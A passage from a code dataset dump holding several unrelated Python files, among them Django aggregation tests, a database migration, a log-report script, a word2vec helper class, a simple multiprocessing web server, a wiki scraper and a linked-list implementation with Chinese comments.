Book.objects.annotate(num_authors=Count(\"authors__id\")).filter(authors__name__contains=\"Norvig\", num_authors__gt=1).aggregate(Avg(\"rating\"))\n self.assertEqual(vals, {\"rating__avg\": 4.25})\n\n def test_even_more_aggregate(self):\n publishers = Publisher.objects.annotate(earliest_book=Min(\"book__pubdate\")).exclude(earliest_book=None).order_by(\"earliest_book\").values()\n self.assertEqual(\n list(publishers), [\n {\n 'earliest_book': datetime.date(1991, 10, 15),\n 'num_awards': 9,\n 'id': 4,\n 'name': 'Morgan Kaufmann'\n },\n {\n 'earliest_book': datetime.date(1995, 1, 15),\n 'num_awards': 7,\n 'id': 3,\n 'name': 'Prentice Hall'\n },\n {\n 'earliest_book': datetime.date(2007, 12, 6),\n 'num_awards': 3,\n 'id': 1,\n 'name': 'Apress'\n },\n {\n 'earliest_book': datetime.date(2008, 3, 3),\n 'num_awards': 1,\n 'id': 2,\n 'name': 'Sams'\n }\n ]\n )\n\n vals = Store.objects.aggregate(Max(\"friday_night_closing\"), Min(\"original_opening\"))\n self.assertEqual(\n vals,\n {\n \"friday_night_closing__max\": datetime.time(23, 59, 59),\n \"original_opening__min\": datetime.datetime(1945, 4, 25, 16, 24, 14),\n }\n )\n\n def test_annotate_values_list(self):\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values_list(\"pk\", \"isbn\", \"mean_age\")\n self.assertEqual(\n list(books), [\n (1, \"159059725\", 34.5),\n ]\n )\n\n books = 
Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values_list(\"isbn\")\n self.assertEqual(\n list(books), [\n ('159059725',)\n ]\n )\n\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values_list(\"mean_age\")\n self.assertEqual(\n list(books), [\n (34.5,)\n ]\n )\n\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values_list(\"mean_age\", flat=True)\n self.assertEqual(list(books), [34.5])\n\n books = Book.objects.values_list(\"price\").annotate(count=Count(\"price\")).order_by(\"-count\", \"price\")\n self.assertEqual(\n list(books), [\n (Decimal(\"29.69\"), 2),\n (Decimal('23.09'), 1),\n (Decimal('30'), 1),\n (Decimal('75'), 1),\n (Decimal('82.8'), 1),\n ]\n )\n\n def test_dates_with_aggregation(self):\n \"\"\"\n Test that .dates() returns a distinct set of dates when applied to a\n QuerySet with aggregation.\n\n Refs #18056. Previously, .dates() would return distinct (date_kind,\n aggregation) sets, in this case (year, num_authors), so 2008 would be\n returned twice because there are books from 2008 with a different\n number of authors.\n \"\"\"\n dates = Book.objects.annotate(num_authors=Count(\"authors\")).dates('pubdate', 'year')\n self.assertQuerysetEqual(\n dates, [\n \"datetime.date(1991, 1, 1)\",\n \"datetime.date(1995, 1, 1)\",\n \"datetime.date(2007, 1, 1)\",\n \"datetime.date(2008, 1, 1)\"\n ]\n )\n","sub_path":"tests/django20/aggregation/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":21295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"376458674","text":"from orator.migrations import Migration\n\n\nclass CreateBibliotecaTable(Migration):\n\n def up(self):\n \"\"\"\n Run the migrations.\n \"\"\"\n with self.schema.create('Biblioteca') as table:\n table.increments('idBiblioteca')\n table.string('Nombre_Biblioteca', 50)\n table.string('Direccion', 70)\n table.timestamps()\n\n def down(self):\n \"\"\"\n Revert the migrations.\n \"\"\"\n self.schema.drop('Biblioteca')\n","sub_path":"Semana8Hackaton/Bryan Arias/App/migrations/2020_07_18_205037_create_biblioteca_table.py","file_name":"2020_07_18_205037_create_biblioteca_table.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"435700181","text":"#! /usr/bin/python3\n\nimport psycopg2\n\n\nclass Query:\n \"\"\" Object to hold query information for dynamic query calls.\n\n Stores information about a query such as a title and template string for\n printing the results, as well as the query string itself. 
This allows a\n single method to process queries via dynamic input.\n\n Attributes:\n title: A title to display when printing query results\n string: The actual SQL query string to execute.\n template: The format string used to parse each printed result.\n \"\"\"\n def __init__(self, title, string, template):\n self.title = title\n self.string = string\n self.template = template\n\n\n# Define the required queries\nqTopArticles = Query(\n \"Most Popular Articles\",\n '''\n SELECT title, views FROM article_views\n JOIN articles\n ON path LIKE CONCAT('%%/', slug)\n LIMIT %s;\n ''',\n \"\\\"{}\\\" - {} views\"\n)\n\nqTopAuthors = Query(\n \"Most Popular Authors\",\n '''\n SELECT name, SUM(views) as sums FROM article_views\n JOIN articles ON path LIKE CONCAT('%%/', slug)\n JOIN authors ON articles.author = authors.id\n GROUP BY name\n ORDER BY sums DESC;\n ''',\n \"{} - {} views\"\n)\n\nqBadRequests = Query(\n \"Bad Reqests\",\n '''\n SELECT dates, result FROM percentage\n WHERE result > %s\n ORDER BY dates;\n ''',\n \"{:%B %d, %Y} - {:.2%} errors\"\n)\n\n\ndef printResults(title, results, template):\n # Start the output off with the title (centered) and an underline\n output = \"\\n{1: ^80}\\n{0:-<80}\\n\"\n\n # Then add a centered line for every row in the results table following\n # the supplied template string formatting\n for result in results:\n output += \"{: ^80}\\n\".format(template.format(result[0], result[1]))\n\n # Put it all together and print it\n print(output.format(\"\", title.upper()))\n\n\ndef processQuery(cursor, query, extras=None):\n # Execute query with any constraints (extras) such as 3 for LIMIT 3\n cursor.execute(query.string, extras)\n cursor.connection.commit()\n\n printResults(query.title, cursor.fetchall(), query.template)\n\n\ndef main():\n conn = psycopg2.connect(database=\"news\")\n cursor = conn.cursor()\n\n processQuery(cursor, qTopArticles, [3]) # Limit 3\n processQuery(cursor, qTopAuthors)\n processQuery(cursor, qBadRequests, [0.01]) # Threshold of 1%\n\n cursor.close()\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"302870105","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom .views import index_view, page_view, rating_page_view, search_page_view, search_with_filter_page_view, time_page_view\nfrom recipes.views import recipe_detail_view\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', index_view, name='index'),\n path('pages/', page_view, name='page'),\n path('recipe//', recipe_detail_view, name='recipe'),\n path('search/&&/', search_page_view, name='search'),\n path('filter/time/&&/', time_page_view, name='time_filter'),\n path('popular//', rating_page_view, name='rating_filter'),\n path('search/filter/&&&&/', search_with_filter_page_view, name='search_with_filter'),\n]\n","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306867232","text":"import numpy as np\nfrom tqdm import tqdm\nimport _pickle as pickle\nfrom scipy.spatial.distance import cosine\nfrom sklearn.neighbors import NearestNeighbors\n\nclass Word2VecModel:\n # word index must start from 1\n # word with idx=0 is empty word, which always has zero embedding\n def __init__(self, word2idx, idx2word, idx2emb):\n 
self._word2idx, self.idx2word, self.idx2emb = word2idx, idx2word, idx2emb\n if not all(v == 0 for v in self.idx2emb[0]):\n raise Exception('Embedding at idx = 0 must be all 0')\n self._neigh = None\n \n def summary(self):\n print(self)\n \n def __repr__(self):\n summary = f'Number of vocabularies: {self.n_vocabs} \\n'\n summary += f'Number of embedding factors: {self.n_embfactors} \\n'\n return summary\n \n @property\n def n_embfactors(self):\n return self.idx2emb.shape[1]\n \n @property\n def n_vocabs(self):\n return self.idx2emb.shape[0]\n \n @property\n def emb_mat(self):\n return self.idx2emb\n \n @classmethod\n def from_fasttext_vec(cls, fname):\n with open(fname, encoding=\"utf-8\") as f:\n nwords, nfeatures = [int(num) for num in f.readline().split()]\n nwords = nwords + 1 #Add empty word at idx 0\n idx2emb = np.zeros((nwords, nfeatures))\n idx2word = [None]*nwords\n word2idx = {}\n for i in tqdm(range(1, nwords)):\n try:\n line = f.readline().strip()\n word, emb = line.split(' ',maxsplit=1)\n emb_vec = [float(num) for num in emb.split()]\n if len(emb_vec) != nfeatures:\n print(f'Error while reading word {i}, parsed word: {word} ')\n continue\n word2idx[word] = i\n idx2word[i] = word\n idx2emb[i,:] = emb_vec\n except Exception as ex:\n print(ex)\n return cls(word2idx, idx2word, idx2emb)\n \n @classmethod\n def from_pickle(cls, fname):\n word2idx, idx2word, idx2emb = pickle.load( open( fname, \"rb\" ) )\n return cls(word2idx, idx2word, idx2emb)\n \n def save(self, fname):\n pickle.dump( (self._word2idx, self.idx2word, self.idx2emb), open( fname, \"wb\" ))\n\n #Maybe improve by splitting unknown word to 2 known words\n def word2emb(self, word):\n if word in self._word2idx:\n return self.idx2emb[self._word2idx[word]]\n else:\n raise NotImplementedError\n \n def word2idx(self, word):\n if word in self._word2idx:\n return self._word2idx[word]\n else:\n return -1\n \n def idx2word(self, idx):\n return self.idx2word(idx)\n \n def dist(self, word1, word2):\n emb1 = self.word2emb(word1)\n emb2 = self.word2emb(word2)\n return self.emb_dist(emb1, emb2)\n \n def emb_dist(self, emb1, emb2):\n return cosine(emb1, emb2)\n \n def neighbors(self, word, k=10):\n if self._neigh is None:\n self._neigh = NearestNeighbors(n_neighbors=k, radius=0.5, metric='cosine', algorithm='brute')\n self._neigh.fit(self.idx2emb)\n distances, indices = self._neigh.kneighbors([self.word2emb(word)], n_neighbors=k)\n return [(self.idx2word[int(ind)], dist) for ind, dist in zip(list(indices[0]), list(distances[0]))]","sub_path":"courses/nik/niklib/w2v_model.py","file_name":"w2v_model.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"177118537","text":"import matplotlib.pyplot as plt\nimport sys\nimport json\n\n\ndef read_from_file(path_to_file, overlap_from=None, overlap_till=None):\n f = open(path_to_file).read()\n txt = \"[\" + f.replace(\"}{\", \"},\\n{\") + \"]\"\n test_result = json.loads(txt)\n medians = []\n averages = []\n overlaps = []\n for step in test_result:\n if overlap_from is not None and step[\"overlap\"] < overlap_from:\n continue\n if overlap_till is not None and step[\"overlap\"] > overlap_till:\n break\n medians.append(step[\"total_median\"])\n averages.append(step[\"total_average\"])\n overlaps.append(step[\"overlap\"])\n return medians, averages, overlaps\n\ndef comparison(d_o, v_o, d_m, v_m, d_a, v_a, file_name, desc=\"simple\"):\n m_dif = []\n a_dif = []\n if len(d_o) < len(v_o):\n v_o = v_o[0:len(d_o)]\n\n 
for i in range(len(v_o)):\n m_dif.append(d_m[i] - v_m[i])\n a_dif.append(d_a[i] - v_a[i])\n\n plt.figure(3)\n\n l1, l2 = plt.plot(v_o, m_dif, 'r^-', v_o, a_dif, 'g^-')\n\n plt.legend((l1, l2), (u'Median', u'Average'), loc=\"upper center\")\n\n plt.xlabel('Overlap')\n\n plt.ylabel('Difference between Docker perfomance and Docker in VM perfomance')\n\n plt.title(desc)\n\n plt.grid(True)\n\n plt.savefig(file_name + \"_difference.png\", dpi=300)\n\ndef real_graphic(d_o, v_o, d_m, v_m, d_a, v_a, file_name):\n plt.figure(1)\n\n line1, line2 = plt.plot(d_o, d_m, 'bD:', v_o, v_m, 'go:')\n\n plt.legend((line1, line2),\n (u'Results for containers', u'Results for containers in VM'), loc=\"upper center\")\n\n plt.xlabel('Overlap')\n\n plt.ylabel('Perfomance (median)')\n\n plt.grid(True)\n\n plt.savefig(file_name + \"_median.png\", dpi=300)\n\n plt.figure(2)\n\n line1, line2 = plt.plot(d_o, d_a, 'bD:', v_o, v_a, 'go:')\n\n plt.legend((line1, line2),\n (u'Results for containers', u'Results for containers in VM'), loc=\"upper center\")\n\n plt.xlabel('Overlap')\n\n plt.ylabel('Perfomance (average)')\n\n plt.grid(True)\n\n plt.savefig(file_name + \"_average.png\", dpi=300)\n\n\n\nif __name__ == \"__main__\":\n path_to_docker = sys.argv[1]\n path_to_kvm = sys.argv[2]\n # path_to_dockerinvm = sys.argv[3]\n # desc = sys.argv[4]\n desc = sys.argv[3]\n file_name = sys.argv[4]\n\n if len(sys.argv) > 5:\n overlap_from = float(sys.argv[5])\n overlap_till = float(sys.argv[6])\n else:\n overlap_till = None\n overlap_from = None\n\n d_ms, d_as, d_os = read_from_file(path_to_docker, overlap_from, overlap_till)\n\n v_ms, v_as, v_os = read_from_file(path_to_kvm, overlap_from, overlap_till)\n\n\n real_graphic(d_os, v_os, d_ms, v_ms, d_as, v_as, file_name)\n\n comparison(d_os, v_os, d_ms, v_ms, d_as, v_as, file_name, desc)","sub_path":"visual_ddvm.py","file_name":"visual_ddvm.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"228659441","text":"import socket\nimport re\nimport multiprocessing\n\nclass WSGIServer(object):\n \"\"\"WSGI服务器类\"\"\"\n def __init__(self):\n # 1. 创建套接字\n self.tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # 设定套接字选项, 可以重复使用地址\n self.tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n # 2. 绑定 \n self.tcp_server_socket.bind((\"\", 7890))\n\n # 3. 监听\n self.tcp_server_socket.listen(128)\n \n \n def service_client(self, tcp_client_socket):\n \"\"\"为客户端服务\"\"\"\n\n # 1. 接收浏览器发送过来的 http 请求\n # GET /index.html HTTP/1.1\n # ......\n # \n # 请求数据内容,对数据内容进行解码\n request = tcp_client_socket.recv(1024).decode(\"utf-8\")\n print(request)\n\n try:\n # 对接收到的请求协议字符串进行按行切割\n # 返回的是由每一行组成的一个列表\n request_lines = request.splitlines()\n\n # 第一行就是http请求头,其中有浏览器需要访问的文件名\n ret = re.match(r\"[^/]+(/[^ ]*)\", request_lines[0])\n # 获取文件名 /index.html\n if ret:\n file_name = ret.group(1)\n if file_name == \"/\":\n file_name = \"/index.html\"\n else:\n pass\n\n except IndexError:\n pass\n\n # 2.返回http格式的数据给浏览器\n try:\n f = open(\"./html\" + file_name, \"rb\")\n except:\n response = \"HTTP/1.1 404 NOT FOUND\\r\\n\"\n response += \"\\r\\n\"\n response += \"------file not found------\"\n tcp_client_socket.send(response.encode(\"utf-8\"))\n else:\n html_content = f.read()\n f.close()\n # 2.1 发给浏览器的数据----header\n # 注意末尾换行一定要加上\\r\\n 表示换行 \n response = \"HTTP/1.1 200 OK\\r\\n\"\n response += \"\\r\\n\" # 在协议头和 请求的数据之间有一个空行\n\n # 2.2 发给浏览器的数据----body \n # response += \"
<h1>YangHang love ZhangZifan</h1>
\"\n \n # 发送回应头\n tcp_client_socket.send(response.encode(\"utf-8\"))\n # 发送客户端请求的内容\n tcp_client_socket.send(html_content) \n \n # 关闭服务套接字\n tcp_client_socket.close()\n\n def run_forever(self):\n \"\"\"完成服务器的整体控制,无限循环运行\"\"\" \n while True:\n # 4. 等待新客户端的连接\n new_socket, client_addr = self.tcp_server_socket.accept()\n\n # 5. 创建一个子进程为这个客户端服务\n p = multiprocessing.Process(target=self.service_client, args=(new_socket, ))\n p.start() \n \n # 关闭父进程中的 new_socket \n new_socket.close()\n\n # 关闭监听套接字\n self.tcp_server_socket.close()\n\ndef main():\n \"\"\"控制整体,创建一个web服务器对象,然后调用这个对象的run_forever方法运行\"\"\"\n wsgi_server = WSGIServer()\n wsgi_server.run_forever()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"07-mini-web框架/01-多进程-面向对象-web服务器/web_server.py","file_name":"web_server.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"340813681","text":"import os\nfrom abc import ABCMeta, abstractmethod\n\nimport pygame\n\nfrom const.button import DEFAULT_H, DEFAULT_W\nfrom const.color import WHITE\nfrom const.event import ENEMY_TOUCH, TURN_END, BATTLE_END_POST, REGEN_POST\nfrom const.panel import BUT1_POS, BUT2_POS, DEFAULT_NAME, DEFAULT_EXP, DEFAULT_LABEL\nfrom const.screen import DEFAULT_SIZE\nfrom engine.button import Button\nfrom engine.label import Label\nfrom loading import load_enemy\nfrom units.enemy import create_enemy\nfrom units.gang import Gang\nfrom units.unit import create_hero\n\n\nclass Scene(metaclass=ABCMeta):\n def __init__(self, image, screen_size, scene_config):\n self._config = scene_config\n self._image = pygame.image.load(image).convert_alpha()\n self._image = pygame.transform.scale(self._image, screen_size)\n self._rect = self._image.get_rect()\n\n @property\n def rect(self):\n return self._rect\n\n @property\n @abstractmethod\n def is_over(self):\n pass\n\n\nclass Battle(Scene):\n def __init__(self, screen_size, scene_config, hero_config):\n image_path = os.path.join('pictures', 'BG', scene_config['image'])\n Scene.__init__(self, image_path, screen_size, scene_config)\n self._turn_hero = True\n self._enemies = [create_enemy(load_enemy(enemy), screen_size[0]) for enemy in scene_config['enemies']]\n self._enemies = Gang(self._enemies, screen_size)\n self._hero = create_hero(hero_config, screen_size)\n self._hero.move_to(int(screen_size[1] * 0.05), int(screen_size[1] * 0.35))\n h = int(DEFAULT_H * screen_size[1] / DEFAULT_SIZE[1])\n w = int(DEFAULT_W * screen_size[0] / DEFAULT_SIZE[0])\n self._button = Button((w, h), (int(0.05 * screen_size[0]), int(0.3 * screen_size[1])), \"Конец хода\", TURN_END)\n\n def update(self):\n self._enemies.animated()\n self._hero.animated()\n self._enemies.dead()\n if self._turn_hero:\n self._hero.hand.hover(pygame.mouse.get_pos())\n else:\n self._enemies.attack(self._hero)\n if len(self._enemies) == 0:\n pygame.event.post(BATTLE_END_POST)\n\n def blit_me(self, surface):\n surface.blit(self._image, self._rect)\n self._hero.blit_me(surface)\n self._enemies.blit_me(surface)\n if self._turn_hero:\n self._button.blit_me(surface)\n\n def click(self, xy):\n self._enemies.click(xy)\n\n def handle_event(self, event):\n if event.type == pygame.MOUSEBUTTONDOWN and self._turn_hero:\n self.click(event.pos)\n self._hero.hand.click(event.pos)\n self._button.handle_event(event)\n if self._hero.rect.collidepoint(event.pos) \\\n and self._hero.hand._selected_card is not None \\\n and self._hero.hand._selected_card.subtype in ('regen', 'effect'):\n 
self._hero.action_card(self._hero._hand._selected_card)\n pygame.event.post(REGEN_POST)\n\n elif event.type == ENEMY_TOUCH:\n if self._hero.hand._selected_card is not None and self._hero.hand._selected_card.subtype not in (\n 'regen', 'effect'):\n self._hero.attack(self._enemies._active, self._hero._hand._selected_card)\n elif event.type == TURN_END:\n self._turn_hero = not self._turn_hero\n if not self._turn_hero:\n self._enemies.attack_init()\n self._hero.update_effect()\n else:\n self._hero.regen()\n self._hero.update_hand()\n pygame.event.post(REGEN_POST)\n else:\n pass # TODO\n\n @property\n def is_over(self):\n pass\n\n @property\n def hero_info(self):\n return self._hero.get_info()\n\n\nclass Quest(Scene):\n def __init__(self, screen_size, scene_config):\n image_path = os.path.join('pictures', 'blueframe2.png')\n Scene.__init__(self, image_path, screen_size, scene_config)\n self._exp = scene_config[\"exp\"]\n self._name = scene_config[\"name\"]\n self._buttons = []\n trans_x = screen_size[0] / DEFAULT_SIZE[0]\n trans_y = screen_size[1] / DEFAULT_SIZE[1]\n but1_pos = (int(BUT1_POS[0] * trans_x), int(BUT1_POS[1] * trans_y))\n but2_pos = (int(BUT2_POS[0] * trans_x), int(BUT2_POS[1] * trans_y))\n but_size = (int(DEFAULT_W * trans_x), int(DEFAULT_H * trans_y))\n self._buttons.append(\n Button(but_size, but1_pos, scene_config[\"buttons\"][0][\"text\"], scene_config[\"buttons\"][0][\"on_click\"]))\n self._buttons.append(\n Button(but_size, but2_pos, scene_config[\"buttons\"][1][\"text\"], scene_config[\"buttons\"][1][\"on_click\"]))\n lab_pos = (int(DEFAULT_LABEL[0] * trans_x), int(DEFAULT_LABEL[1] * trans_y))\n lab_size = (int(DEFAULT_LABEL[2] * trans_x), int(DEFAULT_LABEL[3] * trans_y))\n self._label = Label(scene_config[\"text\"], pos=lab_pos, size=lab_size, font_name='fonts/PhillippScript.ttf',\n color=WHITE)\n self._lab_name = Label(text=self._name, pos=(DEFAULT_NAME[0], DEFAULT_NAME[1]),\n size=(DEFAULT_NAME[2], DEFAULT_NAME[3]), color=WHITE,\n font_name='fonts/PhillippScript.ttf')\n self._lab_exp = Label(text='Опыт за квест: {}'.format(self._exp), pos=(DEFAULT_EXP[0], DEFAULT_EXP[1]),\n size=(DEFAULT_EXP[2], DEFAULT_EXP[3]), color=WHITE, font_name='fonts/PhillippScript.ttf')\n\n def update(self):\n pass\n\n def blit_me(self, surface):\n self._lab_name.blit_me(self._image)\n self._label.blit_me(self._image)\n self._lab_exp.blit_me(self._image)\n for button in self._buttons:\n button.blit_me(self._image)\n surface.blit(self._image, self._rect)\n\n def handle_event(self, event):\n for button in self._buttons:\n button.handle_event(event)\n # TODO\n\n @property\n def is_over(self):\n pass\n\n\nclass Upgrade(Scene):\n def __init__(self, screen_size, scene_config):\n image_path = os.path.join('pictures', 'pergament.png')\n Scene.__init__(self, image_path, screen_size, scene_config)\n image_path = os.path.join('pictures', 'flamer.png')\n image = pygame.image.load(image_path).convert_alpha()\n size = int(0.05 * screen_size[0])\n image = pygame.transform.scale(image, (size, size))\n x = int(0.15 * screen_size[0])\n y = int(0.15 * screen_size[1])\n self._image.blit(image, (x, y))\n image_path = os.path.join('pictures', 'drop.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.35 * screen_size[1])\n self._image.blit(image, (x, y))\n\n image_path = os.path.join('pictures', 'stone-tablet.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.55 * 
screen_size[1])\n self._image.blit(image, (x, y))\n\n image_path = os.path.join('pictures', 'tornado.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.75 * screen_size[1])\n self._image.blit(image, (x, y))\n\n x = int(0.55 * screen_size[0])\n image_path = os.path.join('pictures', 'swords-power.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.15 * screen_size[1])\n self._image.blit(image, (x, y))\n\n image_path = os.path.join('pictures', 'fist.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.35 * screen_size[1])\n self._image.blit(image, (x, y))\n\n image_path = os.path.join('pictures', 'archer.png')\n image = pygame.image.load(image_path).convert_alpha()\n image = pygame.transform.scale(image, (size, size))\n y = int(0.55 * screen_size[1])\n self._image.blit(image, (x, y))\n\n @property\n def is_over(self):\n pass\n\n def blit_me(self, surface):\n surface.blit(self._image, self._rect)\n\n def handle_event(self, event):\n pass\n\n def update(self):\n pass\n\n\ndef create_scene(screen_size, scene_config, hero_config=None):\n if scene_config['type'] == 'quest':\n return Quest(screen_size, scene_config)\n elif scene_config['type'] == 'battle':\n return Battle(screen_size, scene_config, hero_config)\n elif scene_config['type'] == 'upgrade':\n return Upgrade(screen_size, scene_config)\n else:\n raise ValueError('Scene has unknown type.')\n\n\ndef add_exp(hero, quest_config):\n hero.exp += quest_config[\"_exp\"]\n if hero.new_level:\n hero.level_up()\n","sub_path":"scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"292666415","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport html\nimport os\nimport re\n\nimport pandas as pd\nimport requests\nfrom prettyprinter import cpprint\n\ntarget_url = \"http://scp-jp.wikidot.com/guide-hub\"\nstart_word = '

先ずはこれを読んでください

'\nend_word = '
'\n\n\ndef guide_hub():\n    response = requests.get(target_url)\n    if response.status_code != requests.codes.ok:\n        print(f\"\\trequest err : {response.status_code}\")\n\n    masterpath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n    lines = response.text.split(\"\\n\")\n    start = lines.index(start_word)\n\n    df = pd.DataFrame(columns=['url', 'title', 'description'])\n\n    urls = []\n    titles = []\n    descriptions = []\n\n    for line in lines[start:]:\n\n        line = html.unescape(line)\n\n        if end_word in line:\n            break\n\n        if 'href' in line:\n            sp_line = re.split(r'[<>]', line)\n            # needs improvement\n            for i, sp in enumerate(sp_line):\n                if 'href' in sp:\n                    if 'newpage' in sp_line[i]:\n                        url = sp_line[i].replace(\n                            'a class=\"newpage\" href=', \"\").replace(\n                            '\"', \"\")\n                    else:\n                        url = sp_line[i].replace(\n                            'a href=', \"\").replace(\n                            '\"', \"\")\n                    urls.append(url)\n                    titles.append(sp_line[i + 1])\n                    descriptions.append(sp_line[i + 5].replace(\": \", ''))\n                    break\n\n    df['url'] = urls\n    df['title'] = titles\n    df['description'] = descriptions\n\n    df.to_csv(masterpath + \"/data/guide_hub.csv\", header=True, encoding=\"utf-8\")\n\n\nif __name__ == \"__main__\":\n    print(\"Ayame: starting the guide hub database update.\")\n\n    guide_hub()\n\n    print(\"Ayame: guide hub database update finished.\")\n","sub_path":"ayame/guidehub.py","file_name":"guidehub.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"421276945","text":"def integerCubeRootHelper(n, left, right):\n    cube = lambda x: x * x * x  # anonymous function to cube a number\n    # assert(n >= 1)\n    # assert(left < right)\n    # assert(left >= 0)\n    # assert(right < n)\n    # assert(cube(left) < n), f'{left}, {right}'\n    # assert(cube(right) > n), f'{left}, {right}'\n    mid = (left+right)//2\n    print(mid)\n    while mid != left and cube(mid) != n:\n        if cube(mid) > n:\n            right = mid\n        else:\n            left = mid\n        mid = (left+right)//2\n    return mid\n\n\n\n\ndef integerCubeRoot(n):\n    # assert( n > 0)\n    if (n == 1):\n        return 1\n    if (n == 2):\n        return 1\n    return integerCubeRootHelper(n, 0, n-1)\n\nif __name__ == '__main__':\n    print(integerCubeRoot(26))","sub_path":"cuberoot.py","file_name":"cuberoot.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"369565268","text":"from automator import Automator\nfrom prop import END\n\nimport sys\nfrom termios import tcflush, TCIFLUSH\nfrom multiprocessing import Process, Queue\n\nKEYBOARD = Queue()\n\n\ndef main(kb):\n    # Connect to adb.\n    instance = Automator('emulator-5554', kb)\n\n    # Start the script.\n    instance.start()\n\n\nif __name__ == '__main__':\n    p = Process(target=main, args=(KEYBOARD,))\n    p.start()\n    while True:\n        tcflush(sys.stdin, TCIFLUSH)\n        txt = input()\n        if txt == END:\n            KEYBOARD.put(txt)\n            break\n        else:\n            KEYBOARD.put('')\n    p.join()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"498027738","text":"# -*- coding: utf-8 -*-\n\n\nclass Node:\n    def __init__(self, value, next_node=None):\n        self.data = value\n        self.next_node = next_node\n\n\nclass SingleLinkedList:\n\n    def __init__(self):\n        '''\n        Initialize the linked list\n        '''\n        self._head = None\n\n    def insert_to_head(self, value: int):\n        '''\n        Insert a node with the given value at the head of the list\n        :param value:\n        :return:\n        '''\n        new_node = Node(value=value)\n        new_node.next_node = self._head\n        self._head = new_node\n\n    def insert_node_after(self, node, value: int):\n\n        
'''\n        Insert a new node after the given node\n        :param node:\n        :param value:\n        :return:\n        '''\n\n        if node is None:  # inserting after a None node: do nothing\n            return\n\n        new_node = Node(value)\n        new_node.next_node = node.next_node\n        node.next_node = new_node\n\n    def insert_node_before(self, node: Node, value: int):\n        '''\n        Insert a new node before the given node\n        :param node: the target node (assumed to exist)\n        :param value: value of the new node\n        :return:\n        '''\n\n        # if self._head is None:  # empty list\n        #     if node is None:  # the target node is also None; treat it as inserting before the head\n        #         self.insert_to_head(value)\n        #     # a non-None target in an empty list: nothing to do, just return\n        #     return\n        # # need to find the node's predecessor\n        #\n        # pre = self._head\n        # new_node = Node(value)\n        # not_found = False\n        # while pre.next_node != node:\n        #     if pre.next_node is None:  # reached the tail\n        #         not_found = True\n        #         break\n        #     else:\n        #         pre = pre.next_node\n        #\n        # if not not_found:\n        #     new_node.next_node = node\n        #     pre.next_node = new_node\n        dummy = Node(None)\n        dummy.next_node = self._head\n        pre = dummy\n        current = pre.next_node\n        while current != node and current is not None:\n            pre = current\n            current = current.next_node\n\n        if current == node:\n            new_node = Node(value)\n            new_node.next_node = node\n            pre.next_node = new_node\n        self._head = dummy.next_node\n\n    def delete_by_value(self, value: int):\n        '''\n        Delete the first node whose value equals the given value\n        :param value:\n        :return:\n        '''\n        if self._head is None:  # empty list: do nothing\n            return\n\n        if self._head.data == value:  # the head itself is the node to delete\n            self._head = self._head.next_node\n            return\n        pre = self._head\n        node = pre.next_node\n        not_found = False\n        while node.data != value:\n            if node.next_node is None:  # reached the tail without a match\n                not_found = True\n                break\n            else:\n                pre = node\n                node = node.next_node\n        if not not_found:  # found the node to delete\n            pre.next_node = node.next_node\n\n    def delete_by_node(self, node: Node):\n        '''\n        Delete the node the given reference points to\n        :param node:\n        :return:\n        '''\n        if self._head is None or node is None:\n            return\n\n        pre = self._head\n\n        while pre.next_node and pre.next_node != node:\n            pre = pre.next_node\n\n        if pre.next_node:\n            pre.next_node = node.next_node\n\n    def delete_last_n_node(self, n):\n        '''\n        Delete the n-th node from the end, assuming n <= the list length\n\n        A sentinel node simplifies the boundary cases.\n        Use two pointers, fast and slow: the fast pointer moves ahead while the slow one stays put;\n        once the fast pointer has advanced n steps, both move towards the tail together,\n        and when the fast pointer reaches the tail, the slow pointer is at the predecessor\n        of the n-th node from the end\n\n        :param n:\n        